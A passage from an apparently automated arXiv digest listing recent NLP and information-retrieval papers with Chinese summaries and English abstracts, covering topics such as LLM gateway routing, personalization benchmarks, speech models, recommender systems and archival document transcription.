类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Under review
Abstract:While automated sleep staging has achieved expert-level accuracy, its clinical adoption is hindered by a lack of auditable reasoning. We introduce SleepVLM, a rule-grounded vision-language model (VLM) designed to stage sleep from multi-channel polysomnography (PSG) waveform images while generating clinician-readable rationales based on American Academy of Sleep Medicine (AASM) scoring criteria. Utilizing waveform-perceptual pre-training and rule-grounded supervised fine-tuning, SleepVLM achieved Cohen’s kappa scores of 0.767 on an held out test set (MASS-SS1) and 0.743 on an external cohort (ZUAMHCS), matching state-of-the-art performance. Expert evaluations further validated the quality of the model’s reasoning, with mean scores exceeding 4.0/5.0 for factual accuracy, evidence comprehensiveness, and logical coherence. By coupling competitive performance with transparent, rule-based explanations, SleepVLM may improve the trustworthiness and auditability of automated sleep staging in clinical workflows. To facilitate further research in interpretable sleep medicine, we release MASS-EX, a novel expert-annotated dataset.
[NLP-98] SEAR: Schema-Based Evaluation and Routing for LLM Gateways
【速读】: 该论文旨在解决多模型、多提供商的大语言模型(Large Language Model, LLM)网关中,如何基于细粒度的质量信号和操作性决策来评估生成结果并进行请求路由的问题。其核心挑战在于现有方法难以同时兼顾对响应质量的深度理解与实际部署中的可操作性。解决方案的关键在于提出SEAR系统,该系统采用可扩展的关系型数据 schema,统一建模LLM评估信号(如上下文、意图、响应特征、问题归因及质量评分)与网关运营指标(如延迟、成本、吞吐量),并通过自包含的信号指令、内嵌推理机制和多阶段生成策略,确保输出结构化且可直接用于数据库查询的结果。由于信号来源于LLM自身的推理而非浅层分类器,SEAR不仅能够捕捉复杂请求语义,还支持人类可解释的路由决策,并将评估与路由整合为单一查询层,从而在数千次生产会话中实现高精度信号识别与显著的成本优化。
链接: https://arxiv.org/abs/2603.26728
作者: Zecheng Zhang,Han Zheng,Yue Xu
机构: Strukto.AI(Strukto.AI); Infron.AI(Infron.AI)
类目: Databases (cs.DB); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 10 pages, 6 pages appendix, 4 figures, 12 tables
Abstract:Evaluating production LLM responses and routing requests across providers in LLM gateways requires fine-grained quality signals and operationally grounded decisions. To address this gap, we present SEAR, a schema-based evaluation and routing system for multi-model, multi-provider LLM gateways. SEAR defines an extensible relational schema covering both LLM evaluation signals (context, intent, response characteristics, issue attribution, and quality scores) and gateway operational metrics (latency, cost, throughput), with cross-table consistency links across around one hundred typed, SQL-queryable columns. To populate the evaluation signals reliably, SEAR proposes self-contained signal instructions, in-schema reasoning, and multi-stage generation that produces database-ready structured outputs. Because signals are derived through LLM reasoning rather than shallow classifiers, SEAR captures complex request semantics, enables human-interpretable routing explanations, and unifies evaluation and routing in a single query layer. Across thousands of production sessions, SEAR achieves strong signal accuracy on human-labeled data and supports practical routing decisions, including large cost reductions with comparable quality.
[NLP-99] AlpsBench: An LLM Personalization Benchmark for Real-Dialogue Memorization and Preference Alignment
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在成为终身AI助手过程中,因缺乏金标准评估基准而导致的个性化能力发展受阻问题。现有基准或忽视个性化信息管理的关键环节,或依赖合成对话数据,存在与真实对话分布不一致的问题。其解决方案的核心是提出AlpsBench——一个基于真实人类-LLM交互对话(来自WildChat数据集)构建的LLM个性化评估基准,包含2,500条长期交互序列及人工验证的结构化记忆,涵盖显性和隐性个性化信号,并定义了个性化信息提取、更新、检索与利用四大核心任务,建立了完整的记忆管理生命周期评估协议,从而为LLM个性化研究提供可量化、可复现的评估框架。
链接: https://arxiv.org/abs/2603.26680
作者: Jianfei Xiao,Xiang Yu,Chengbing Wang,Wuqiang Zheng,Xinyu Lin,Kaining Liu,Hongxun Ding,Yang Zhang,Wenjie Wang,Fuli Feng,Xiangnan He
机构: University of Science and Technology of China (中国科学技术大学); National University of Singapore (新加坡国立大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注:
Abstract:As Large Language Models (LLMs) evolve into lifelong AI assistants, LLM personalization has become a critical frontier. However, progress is currently bottlenecked by the absence of a gold-standard evaluation benchmark. Existing benchmarks either overlook personalized information management that is critical for personalization or rely heavily on synthetic dialogues, which exhibit an inherent distribution gap from real-world dialogue. To bridge this gap, we introduce AlpsBench, An LLM PerSonalization benchmark derived from real-world human-LLM dialogues. AlpsBench comprises 2,500 long-term interaction sequences curated from WildChat, paired with human-verified structured memories that encapsulate both explicit and implicit personalization signals. We define four pivotal tasks - personalized information extraction, updating, retrieval, and utilization - and establish protocols to evaluate the entire lifecycle of memory management. Our benchmarking of frontier LLMs and memory-centric systems reveals that: (i) models struggle to reliably extract latent user traits; (ii) memory updating faces a performance ceiling even in the strongest models; (iii) retrieval accuracy declines sharply in the presence of large distractor pools; and (iv) while explicit memory mechanisms improve recall, they do not inherently guarantee more preference-aligned or emotionally resonant responses. AlpsBench aims to provide a comprehensive framework.
[NLP-100] GeoBlock: Inferring Block Granularity from Dependency Geometry in Diffusion Language Models
【速读】: 该论文旨在解决块扩散(block diffusion)在解码过程中因块大小设置不当而导致的依赖关系不一致问题,即现有块划分策略依赖固定规则或启发式信号,未能充分考虑决定哪些token可安全并行优化的依赖几何结构(dependency geometry)。解决方案的关键在于提出GeoBlock框架,该框架通过分析注意力机制导出的跨token依赖模式,直接从依赖几何中确定块粒度,动态识别几何稳定的优化区域并自适应调整块边界,从而在保持块扩散并行效率的同时,确保依赖一致性的更新,实现类似自回归模型的可靠性。该方法无需额外训练,可无缝集成至现有块扩散架构中。
链接: https://arxiv.org/abs/2603.26675
作者: Lipeng Wan,Junjie Ma,Jianhui Gu,Zeyang Liu,Xuyang Lu,Xuguang Lan
机构: Xi’an Jiaotong University (西安交通大学)
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 13 pages, 4 figures, Code available upon publication
Abstract:Block diffusion enables efficient parallel refinement in diffusion language models, but its decoding behavior depends critically on block size. Existing block-sizing strategies rely on fixed rules or heuristic signals and do not account for the dependency geometry that determines which tokens can be safely refined together. This motivates a geometry view of diffusion decoding: \emphregions with strong causal ordering require sequential updates, whereas semantically cohesive regions admit parallel refinement. We introduce GeoBlock, a geometry-aware block inference framework that determines block granularity directly from attention-derived dependency geometry. Instead of relying on predefined schedules or local confidence heuristics, GeoBlock analyzes cross-token dependency patterns to identify geometrically stable refinement regions and dynamically determines appropriate block boundaries during decoding. By adapting block granularity to the dependency geometry, GeoBlock preserves the parallel efficiency of block diffusion while enforcing dependency-consistent refinement that exhibits autoregressive reliability. GeoBlock requires no additional training and integrates seamlessly into existing block diffusion architectures. Extensive experiments across multiple benchmarks show that GeoBlock reliably identifies geometry-consistent block boundaries and improves the accuracy of block diffusion with only a small additional computational budget.
[NLP-101] Exploring Cultural Variations in Moral Judgments with Large Language Models
【速读】: 该论文旨在解决大型语言模型(Large Language Models, LLMs)在捕捉文化多样性道德价值观方面的能力尚不明确的问题。研究通过对比多个单语和多语言模型(如GPT-2、OPT、BLOOMZ、Qwen)与近期指令微调模型(如GPT-4o、GPT-4o-mini、Gemma-2-9b-it、Llama-3.3-70B-Instruct),利用基于对数概率的道德正当性评分(log-probability-based moral justifiability scores)与世界价值观调查(World Values Survey, WVS)及皮尤研究中心全球态度调查(Pew Research Center’s Global Attitudes Survey, PEW)数据进行相关性分析,发现早期或较小模型往往与人类判断呈现接近零或负相关,而先进指令微调模型则表现出显著更高的正相关性,表明其更贴近现实世界的道德态度。关键解决方案在于采用指令微调(instruction tuning)策略,并结合跨文化伦理议题的量化评估方法,从而有效提升模型对不同区域道德规范的理解与映射能力,尽管仍存在部分话题和地区上的偏差问题。
链接: https://arxiv.org/abs/2506.12433
作者: Hadi Mohammadi,Ayoub Bagheri
机构: Utrecht University (乌得勒支大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注:
Abstract:Large Language Models (LLMs) have shown strong performance across many tasks, but their ability to capture culturally diverse moral values remains unclear. In this paper, we examine whether LLMs mirror variations in moral attitudes reported by the World Values Survey (WVS) and the Pew Research Center’s Global Attitudes Survey (PEW). We compare smaller monolingual and multilingual models (GPT-2, OPT, BLOOMZ, and Qwen) with recent instruction-tuned models (GPT-4o, GPT-4o-mini, Gemma-2-9b-it, and Llama-3.3-70B-Instruct). Using log-probability-based \emphmoral justifiability scores, we correlate each model’s outputs with survey data covering a broad set of ethical topics. Our results show that many earlier or smaller models often produce near-zero or negative correlations with human judgments. In contrast, advanced instruction-tuned models achieve substantially higher positive correlations, suggesting they better reflect real-world moral attitudes. We provide a detailed regional analysis revealing that models align better with Western, Educated, Industrialized, Rich, and Democratic (W.E.I.R.D.) nations than with other regions. While scaling model size and using instruction tuning improves alignment with cross-cultural moral norms, challenges remain for certain topics and regions. We discuss these findings in relation to bias analysis, training data diversity, information retrieval implications, and strategies for improving the cultural sensitivity of LLMs.
[NLP-102] ParaSpeechCLAP: A Dual-Encoder Speech-Text Model for Rich Stylistic Language-Audio Pretraining
【速读】: 该论文旨在解决现有模型在语音风格表征方面能力有限的问题,特别是其对语音中内在(如说话人特征)和情境(如语句层面的情感、音调等)风格描述符的建模能力较为狭窄。解决方案的关键在于提出ParaSpeechCLAP,一个双编码器对比学习模型,能够将语音与文本风格描述词映射到统一的嵌入空间,从而支持更广泛的语音风格维度(如音高、质感、情绪等)。通过训练专用的ParaSpeechCLAP-Intrinsic(专注内在风格)、ParaSpeechCLAP-Situational(专注情境风格)以及统一的ParaSpeechCLAP-Combined模型,研究发现专业化模型在单一风格维度上表现更强,而统一模型在组合式评估中更优;此外,引入分类损失和类别平衡训练进一步提升了内在风格模型的性能。
链接: https://arxiv.org/abs/2603.28737
作者: Anuj Diwan,Eunsol Choi,David Harwath
机构: The University of Texas at Austin (德克萨斯大学奥斯汀分校); New York University (纽约大学)
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Sound (cs.SD)
备注: Under review
Abstract:We introduce ParaSpeechCLAP, a dual-encoder contrastive model that maps speech and text style captions into a common embedding space, supporting a wide range of intrinsic (speaker-level) and situational (utterance-level) descriptors (such as pitch, texture and emotion) far beyond the narrow set handled by existing models. We train specialized ParaSpeechCLAP-Intrinsic and ParaSpeechCLAP-Situational models alongside a unified ParaSpeechCLAP-Combined model, finding that specialization yields stronger performance on individual style dimensions while the unified model excels on compositional evaluation. We further show that ParaSpeechCLAP-Intrinsic benefits from an additional classification loss and class-balanced training. We demonstrate our models’ performance on style caption retrieval, speech attribute classification and as an inference-time reward model that improves style-prompted TTS without additional training. ParaSpeechCLAP outperforms baselines on most metrics across all three applications. Our models and code are released at this https URL .
[NLP-103] Q-Bridge: Code Translation for Quantum Machine Learning via LLM s
【速读】: 该论文旨在解决当前量子机器学习(Quantum Machine Learning, QML)领域中缺乏标准化、高质量数据集和鲁棒代码转换框架的问题,从而阻碍了经典机器学习(Classical Machine Learning, CML)与QML之间的有效衔接。其解决方案的关键在于提出Q-Bridge——一个由大语言模型(Large Language Models, LLMs)引导的代码翻译框架,通过自迭代扩展机制将已验证的经典机器学习代码库系统性地转化为可执行的量子机器学习变体,构建出大规模数据集CML-2-QML,并采用监督式LoRA微调策略实现高效、内存友好的训练,从而在多种架构上生成忠实且可解释的量子代码,验证了直接从CML到QML翻译的可行性并揭示了两类范式间的结构一致性。
链接: https://arxiv.org/abs/2603.27836
作者: Runjia Zeng,Priyabrata Senapati,Ruixiang Tang,Dongfang Liu,Qiang Guan
机构: 未知
类目: Quantum Physics (quant-ph); Computation and Language (cs.CL)
备注:
Abstract:Large language models have recently shown potential in bridging the gap between classical machine learning and quantum machine learning. However, the lack of standardized, high-quality datasets and robust translation frameworks limits progress in this domain. We introduce Q-Bridge, an LLM-guided code translation framework that systematically converts CML implementations into executable QML variants. Our approach builds on a self-involving pipeline that iteratively expands a verified seed codebase into a large-scale dataset, CML-2-QML, integrating verifiable and unverifiable code pairs. The Q-Bridge model is fine-tuned using supervised LoRA adaptation for scalable and memory-efficient training, achieving faithful and interpretable quantum code generation across diverse architectures. Empirical analysis confirms the feasibility of direct CML-to-QML translation and reveals consistent structural alignment between classical and quantum paradigms. Case studies further demonstrate that Q-Bridge can maintain deterministic correctness and also enable creative architectural exploration. This work establishes the first reproducible framework and dataset for LLM-driven quantum code translation, offering a foundation for scalable quantum AI development.
[NLP-104] PHONOS: PHOnetic Neutralization for Online Streaming Applications INTERSPEECH2026
【速读】: 该论文旨在解决语音匿名化(Speaker Anonymization, SA)系统在保留非本地口音(non-native accent)时导致的匿名集合缩小问题,因为口音会泄露说话者身份信息。解决方案的关键在于提出PHONOS,一个实时流式模块,通过预生成保留源音色和节奏但替换非母语发音单元(segmentals)为母语发音的“黄金语音”样本,利用带静默感知的动态时间规整(silence-aware DTW alignment)与零样本语音转换技术进行监督训练;进而采用因果口音翻译器(causal accent translator),仅需最多40ms前瞻窗口,将非母语内容标记映射为母语等效形式,训练时结合交叉熵与连接时序分类(CTC)损失。实验表明,该方法使非母语口音置信度降低81%,听觉测试评分与之匹配,并显著降低说话人关联性,同时延迟低于241ms(单GPU)。
链接: https://arxiv.org/abs/2603.27001
作者: Waris Quamer,Mu-Ruei Tseng,Ghady Nasrallah,Ricardo Gutierrez-Osuna
机构: Texas AM University (德州农工大学)
类目: Audio and Speech Processing (eess.AS); Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: The paper is submitted to Interspeech 2026 and currently under review
Abstract:Speaker anonymization (SA) systems modify timbre while leaving regional or non-native accents intact, which is problematic because accents can narrow the anonymity set. To address this issue, we present PHONOS, a streaming module for real-time SA that neutralizes non-native accent to sound native-like. Our approach pre-generates golden speaker utterances that preserve source timbre and rhythm but replace foreign segmentals with native ones using silence-aware DTW alignment and zero-shot voice conversion. These utterances supervise a causal accent translator that maps non-native content tokens to native equivalents with at most 40ms look-ahead, trained using joint cross-entropy and CTC losses. Our evaluations show an 81% reduction in non-native accent confidence, with listening-test ratings consistent with this shift, and reduced speaker linkability as accent-neutralized utterances move away from the original speaker in embedding space while having latency under 241 ms on single GPU.
信息检索
[IR-0] CirrusBench: Evaluating LLM -based Agents Beyond Correctness in Real-World Cloud Service Environments KDD2026
【速读】:该论文旨在解决当前大型语言模型(Large Language Models, LLMs)在真实客户技术支持场景中评估不足的问题,尤其是现有基准测试多依赖合成环境,难以反映真实用户输入的多样性与不可预测性,且普遍忽视了服务响应效率这一关键指标。解决方案的关键在于提出CirrusBench评估框架,其核心创新在于基于真实云服务工单数据构建评测体系,保留技术客服场景中的多轮逻辑链和工具依赖关系,并引入以客户为中心的新指标(如归一化效率指数和多轮延迟),从而更全面地衡量LLM代理在准确性与效率上的综合表现,揭示当前先进模型在复杂多轮任务中效率短板,为实际技术应用提供更具指导意义的评估标准。
链接: https://arxiv.org/abs/2603.28569
作者: Yi Yu,Guangquan Hu,Chenghuang Shen,Xingyan Liu,Jing Gu,Hangyi Sun,Junzhuo Ma,Weiting Liu,Jianfeng Liu,Mingyue Pu,Yu Wang,Zhengdong Xiao,Rui Xie,Longjiu Luo,Qianrong Wang,Gurong Cui,Honglin Qiao,Wenlian Lu
机构: Fudan University (复旦大学); Alibaba Group (阿里巴巴集团)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR); Performance (cs.PF)
备注: Submitted for SIGKDD 2026
Abstract:The increasing agentic capabilities of Large Language Models (LLMs) have enabled their deployment in real-world applications, such as cloud services, where customer-assistant interactions exhibit high technical complexity and long-horizon dependencies, making robustness and resolution efficiency critical for customer satisfaction. However, existing benchmarks for LLM-based agents largely rely on synthetic environments that fail to capture the diversity and unpredictability of authentic customer inputs, often ignoring the resolution efficiency essential for real-world deployment. To bridge this gap, we introduce CirrusBench, a novel evaluation framework distinguished by its foundation in real-world data from authentic cloud service tickets. CirrusBench preserves the intricate multi-turn logical chains and realistic tool dependencies inherent to technical service environments. Moving beyond execution correctness, we introduce novel Customer-Centric metrics to define agent success, quantifying service quality through metrics such as the Normalized Efficiency Index and Multi-Turn Latency to explicitly measure resolution efficiency. Experiments utilizing our framework reveal that while state-of-the-art models demonstrate strong reasoning capabilities, they frequently struggle in complex, realistic multi-turn tasks and fail to meet the high-efficiency standards required for customer service, highlighting critical directions for the future development of LLM-based agents in practical technical service applications. CirrusBench evaluation framework is released at: this https URL
[IR-1] Hydra: Unifying Document Retrieval and Generation in a Single Vision-Language Model
【速读】:该论文旨在解决视觉文档理解中检索与生成模型分离所导致的内存占用翻倍和系统复杂度增加的问题。其核心解决方案是提出 Hydra,一种基于单个视觉语言模型(VLM)的双头架构,通过一个仅用于检索训练的 LoRA 适配器在推理时切换模式:启用该适配器可生成多向量嵌入以支持 ColBERT 风格的晚期交互式检索;禁用则恢复基础模型的生成能力,实现字节级完全一致的输出(在 10,500 个贪婪和随机采样样本中达 100% 一致性),且在四个 VQA 基准测试上最大 delta-ANLS 差异仅为 0.0044(共 15,301 个样本)。关键创新在于识别并实现三个工程要求(注意力模式恢复、lm_head 保留、KV 缓存感知解码),确保即使权重正确恢复,生成质量也不受影响,从而实现单一模型同时支持高效检索与高质量生成。
链接: https://arxiv.org/abs/2603.28554
作者: Athos Georgiou
机构: Independent Researcher; NCA-IT (NCA-IT公司)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: Comments: 17 pages, 2 figures, 7 tables. ## Model Cards - this https URL - this https URL - this https URL - this https URL ## Scripts evals - this https URL
Abstract:Visual document understanding typically requires separate retrieval and generation models, doubling memory and system complexity. We present Hydra, a dual-head approach that provides both ColBERT-style late-interaction retrieval and autoregressive generation from a single vision-language model (VLM). A single LoRA adapter, trained only for retrieval, is toggled at inference: enabling it produces multi-vector embeddings; disabling it recovers the base model’s generation quality – byte-identical outputs in 100% of 10,500 greedy and stochastic samples, with max delta-ANLS = 0.0044 across 15,301 samples on four VQA benchmarks (three informative; ChartQA is near-zero for both models under greedy decoding) when compared against an independent base-model pipeline. We identify three engineering requirements (attention-mode restoration, lm_head preservation, KV-cache-aware decoding) whose omission silently breaks generation despite correct weight recovery. On ViDoRe V1, Hydra (4B) is within 1 percentage point of a controlled single-head baseline in a single training run, with higher aggregate scores on V2 and V3 that are concentrated on a subset of tasks; multi-seed experiments are needed to confirm these trends. The single-model design reduces peak GPU memory by 41%, though adapter switching introduces throughput overhead under concurrent serving loads. An ablation shows that GritLM-style joint training provides no benefit within the LoRA-based (r=16) training regime. A proof-of-concept extension to Qwen2.5-Omni-3B demonstrates that the mechanism generalizes to audio retrieval and video embedding, with speech generation.
[IR-2] With a Little Help From My Friends: Collective Manipulation in Risk-Controlling Recommender Systems
【速读】:该论文旨在解决风险控制型推荐系统(risk-controlling recommender systems)在面对协同式恶意用户行为时的脆弱性问题。这类系统依赖于用户的二元反馈(如“不感兴趣”)通过置信区间风险控制(conformal risk control)机制来保证个体对不良内容的暴露可控,但其对聚合反馈信号的依赖使其易受小规模协调群体的操纵。研究表明,仅占用户总数1%的协同攻击者即可导致非攻击用户的整体推荐质量下降高达20%。论文提出的关键解决方案是将安全保证从群体层面迁移至用户个体层面,从而在降低协同攻击影响的同时,仍能保障每个用户的个性化安全需求。
链接: https://arxiv.org/abs/2603.28476
作者: Giovanni De Toni,Cristian Consonni,Erasmo Purificato,Emilia Gomez,Bruno Lepri
机构: Fondazione Bruno Kessler (布鲁诺·凯斯勒基金会); European Commission, Joint Research Centre (JRC) (欧盟委员会联合研究中心)
类目: Information Retrieval (cs.IR); Machine Learning (cs.LG); Social and Information Networks (cs.SI)
备注:
Abstract:Recommendation systems have become central gatekeepers of online information, shaping user behaviour across a wide range of activities. In response, users increasingly organize and coordinate to steer algorithmic outcomes toward diverse goals, such as promoting relevant content or limiting harmful material, relying on platform affordances – such as likes, reviews, or ratings. While these mechanisms can serve beneficial purposes, they can also be leveraged for adversarial manipulation, particularly in systems where such feedback directly informs safety guarantees. In this paper, we study this vulnerability in recently proposed risk-controlling recommender systems, which use binary user feedback (e.g., “Not Interested”) to provably limit exposure to unwanted content via conformal risk control. We empirically demonstrate that their reliance on aggregate feedback signals makes them inherently susceptible to coordinated adversarial user behaviour. Using data from a large-scale online video-sharing platform, we show that a small coordinated group (comprising only 1% of the user population) can induce up to a 20% degradation in nDCG for non-adversarial users by exploiting the affordances provided by risk-controlling recommender systems. We evaluate simple, realistic attack strategies that require little to no knowledge of the underlying recommendation algorithm and find that, while coordinated users can significantly harm overall recommendation quality, they cannot selectively suppress specific content groups through reporting alone. Finally, we propose a mitigation strategy that shifts guarantees from the group level to the user level, showing empirically how it can reduce the impact of adversarial coordinated behaviour while ensuring personalized safety for individuals.
[IR-3] RCLRec: Reverse Curriculum Learning for Modeling Sparse Conversions in Generative Recommendation
【速读】:该论文旨在解决大规模推荐系统中转化目标(conversion)数据稀疏导致的优化困难问题。现有生成式推荐(Generative Recommendation, GR)方法虽通过将多类型行为统一为 token 序列缓解稀疏性,但仍缺乏对转化信号的有效建模,且依赖标准注意力机制处理完整历史,未提供针对转化的额外监督。其解决方案的关键在于提出基于逆向课程学习(Reverse Curriculum Learning, RCL)的 GR 框架 RCLRec:对于每个转化目标,RCLRec 从用户历史中逆序选取与转化相关的子序列作为“课程”,将其语义 token 作为解码器前缀,与目标转化 token 共同构成联合生成目标。该设计引入了实例特定的中间监督信号,显著缓解转化稀疏性,并聚焦模型于用户的决策关键路径;同时引入课程质量感知损失以确保所选课程对转化预测具有信息价值。
链接: https://arxiv.org/abs/2603.28124
作者: Yulei Huang,Hao Deng,Haibo Xing,Jinxin Hu,Chuanfei Xu,Zulong Chen,Yu Zhang,Xiaoyi Zeng
机构: Alibaba International Digital Commerce Group(阿里巴巴国际数字商业集团); Alibaba Group(阿里巴巴集团); AI, Guangdong Laboratory of Artificial Intelligence and Digital Economy(人工智能,广东省人工智能与数字经济实验室)
类目: Information Retrieval (cs.IR)
备注:
Abstract:Conversion objectives in large-scale recommender systems are sparse, making them difficult to optimize. Generative recommendation (GR) partially alleviates data sparsity by organizing multi-type behaviors into a unified token sequence with shared representations, but conversion signals remain insufficiently modeled. While recent behavior-aware GR models encode behavior types and employ behavior-aware attention to highlight decision-related intermediate behaviors, they still rely on standard attention over the full history and provide no additional supervision for conversions, leaving conversion sparsity largely unresolved. To address these challenges, we propose RCLRec, a reverse curriculum learning-based GR framework for sparse conversion supervision. For each conversion target, RCLRec constructs a short curriculum by selecting a subsequence of conversion-related items from the history in reverse. Their semantic tokens are fed to the decoder as a prefix, together with the target conversion tokens, under a joint generation objective. This design provides additional instance-specific intermediate supervision, alleviating conversion sparsity and focusing the model on the user’s critical decision process. We further introduce a curriculum quality-aware loss to ensure that the selected curricula are informative for conversion prediction. Experiments on offline datasets and an online A/B test show that RCLRec achieves superior performance, with +2.09% advertising revenue and +1.86% orders in online deployment.
[IR-4] Quid est VERITAS? A Modular Framework for Archival Document Analysis
【速读】:该论文旨在解决历史文献数字化过程中仅限于字符级转录(character-level transcription)导致的结构与语义信息缺失问题,从而限制了计算分析的有效性。其解决方案的关键在于提出一个模块化、模型无关的框架VERITAS(Vision-Enhanced Reading, Interpretation, and Transcription of Archival Sources),将数字化重构为包含转录、版面分析和语义增强的集成工作流,采用基于模式驱动的架构,允许研究者以声明式方式指定提取目标,并通过四阶段处理流程(预处理、提取、精炼与增强)显著提升准确性与效率。实证表明,该方法在伯纳迪诺·科里奥《米兰史》的测试中相较商用OCR基线降低67.6%词错误率,并减少三倍端到端处理时间(含人工校正)。
链接: https://arxiv.org/abs/2603.28108
作者: Leonardo Bassanini,Ludovico Biancardi,Alfio Ferrara,Andrea Gamberini,Sergio Picascia,Folco Vaglienti
机构: 未知
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: to be published in: LLMs4SSH: Shaping Multilingual, Multimodal AI for the Social Sciences and Humanities, organized within the 15th Language Resource and Evaluation Conference (2026)
Abstract:The digitisation of historical documents has traditionally been conceived as a process limited to character-level transcription, producing flat text that lacks the structural and semantic information necessary for substantive computational analysis. We present VERITAS (Vision-Enhanced Reading, Interpretation, and Transcription of Archival Sources), a modular, model-agnostic framework that reconceptualises digitisation as an integrated workflow encompassing transcription, layout analysis, and semantic enrichment. The pipeline is organised into four stages - Preprocessing, Extraction, Refinement, and Enrichment - and employs a schema-driven architecture that allows researchers to declaratively specify their extraction objectives. We evaluate VERITAS on the critical edition of Bernardino Corio’s Storia di Milano, a Renaissance chronicle of over 1,600 pages. Results demonstrate that the pipeline achieves a 67.6% relative reduction in word error rate compared to a commercial OCR baseline, with a threefold reduction in end-to-end processing time when accounting for manual correction. We further illustrate the downstream utility of the pipeline’s output by querying the transcribed corpus through a retrieval-augmented generation system, demonstrating its capacity to support historical inquiry.
[IR-5] ranscription and Recognition of Italian Parliamentary Speeches Using Vision-Language Models ACL
【速读】:该论文旨在解决历史扫描文档中意大利议会演讲的自动转录、语义分割与实体链接问题,现有基于传统光学字符识别(Optical Character Recognition, OCR)的方法存在转录错误多、语义标注有限等缺陷。解决方案的关键在于构建一个融合视觉-语言模型(Vision-Language Model)的端到端处理流程:首先使用专用OCR模型提取文本并保持阅读顺序,随后借助大规模视觉-语言模型联合推理视觉布局与文本内容,实现转录优化、元素分类及发言人识别;最后通过SPARQL查询和多策略模糊匹配将识别出的发言人链接至众议院知识库。实证表明,该方法在转录质量和发言人标注上均显著优于现有基准。
链接: https://arxiv.org/abs/2603.28103
作者: Luigi Curini,Alfio Ferrara,Giovanni Pagano,Sergio Picascia
机构: 未知
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注: to be published in: ParlaCLARIN V: Interoperability, Multilinguality, and Multimodality in Parliamentary Corpora, organized within the 15th Language Resource and Evaluation Conference (2026)
Abstract:Parliamentary proceedings represent a rich yet challenging resource for computational analysis, particularly when preserved only as scanned historical documents. Existing efforts to transcribe Italian parliamentary speeches have relied on traditional Optical Character Recognition pipelines, resulting in transcription errors and limited semantic annotation. In this paper, we propose a pipeline based on Vision-Language Models for the automatic transcription, semantic segmentation, and entity linking of Italian parliamentary speeches. The pipeline employs a specialised OCR model to extract text while preserving reading order, followed by a large-scale Vision-Language Model that performs transcription refinement, element classification, and speaker identification by jointly reasoning over visual layout and textual content. Extracted speakers are then linked to the Chamber of Deputies knowledge base through SPARQL queries and a multi-strategy fuzzy matching procedure. Evaluation against an established benchmark demonstrates substantial improvements both in transcription quality and speaker tagging.
[IR-6] On the Accuracy Limits of Sequential Recommender Systems: An Entropy-Based Approach
【速读】:该论文旨在解决顺序推荐系统(Sequential Recommender Systems)中缺乏可靠、模型无关的准确率上限估计问题,从而在模型开发前实现对任务难度的客观评估与性能提升空间的量化。现有方法多依赖熵估计结合Fano不等式反演,但在推荐场景下易受候选集规模影响,并在低可预测性区域因Fano缩放导致偏差。论文提出一种基于熵诱导的、无需训练的准确率上限估算方法,其关键创新在于通过理论推导构建一个与候选集大小无关的估计器,能够在可控合成数据和多种真实世界基准上更忠实反映任务难度,且与当前最优模型的离线准确率具有高秩相关性(Spearman rho 最高达 0.914),同时支持用户群体诊断与数据选择优化,为推荐系统的数据驱动决策提供实用参考。
链接: https://arxiv.org/abs/2603.27952
作者: En Xu,Jingtao Ding,Yong Li
机构: Tsinghua University (清华大学)
类目: Information Retrieval (cs.IR)
备注:
Abstract:Sequential recommender systems have achieved steady gains in offline accuracy, yet it remains unclear how close current models are to the intrinsic accuracy limit imposed by the data. A reliable, model-agnostic estimate of this ceiling would enable principled difficulty assessment and headroom estimation before costly model development. Existing predictability analyses typically combine entropy estimation with Fano’s inequality inversion; however, in recommendation they are hindered by sensitivity to candidate-space specification and distortion from Fano-based scaling in low-predictability regimes. We develop an entropy-induced, training-free approach for quantifying accuracy limits in sequential recommendation, yielding a candidate-size-agnostic estimate. Experiments on controlled synthetic generators and diverse real-world benchmarks show that the estimator tracks oracle-controlled difficulty more faithfully than baselines, remains insensitive to candidate-set size, and achieves high rank consistency with best-achieved offline accuracy across state-of-the-art sequential recommenders (Spearman rho up to 0.914). It also supports user-group diagnostics by stratifying users by novelty preference, long-tail exposure, and activity, revealing systematic predictability differences. Furthermore, predictability can guide training data selection: training sets constructed from high-predictability users yield strong downstream performance under reduced data budgets. Overall, the proposed estimator provides a practical reference for assessing attainable accuracy limits, supporting user-group diagnostics, and informing data-centric decisions in sequential recommendation.
[IR-7] GEAKG: Generative Executable Algorithm Knowledge Graphs
【速读】:该论文旨在解决算法设计中程序性知识(procedural knowledge)难以显式表示、复用与迁移的问题,即当前算法代码中的“know-how”往往隐含在实现细节中,无法跨任务或领域有效传承。其解决方案的核心是提出生成式可执行算法知识图谱(Generative Executable Algorithm Knowledge Graphs, GEAKG),关键在于:1)将节点定义为可执行的操作符(executable operators),边编码学习到的组合模式(composition patterns),通过遍历生成解;2)具备生成性(由大语言模型合成拓扑与操作符)、可执行性(每个节点均为可运行代码)和可迁移性(零样本跨域泛化);3)采用统一的三层架构与基于蚁群优化(Ant Colony Optimization, ACO)的学习引擎,仅需替换插件式本体(pluggable ontology, \textttRoleSchema)即可适配不同领域,实验证明其在神经架构搜索和组合优化任务中均能实现零样本知识迁移。
链接: https://arxiv.org/abs/2603.27922
作者: Camilo Chacón Sartori,José H. García,Andrei Voicu Tomut,Christian Blum
机构: Catalan Institute of Nanoscience and Nanotechnology (ICN2), CSIC and BIST, Campus UAB, Bellaterra, Barcelona, Spain
类目: Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注:
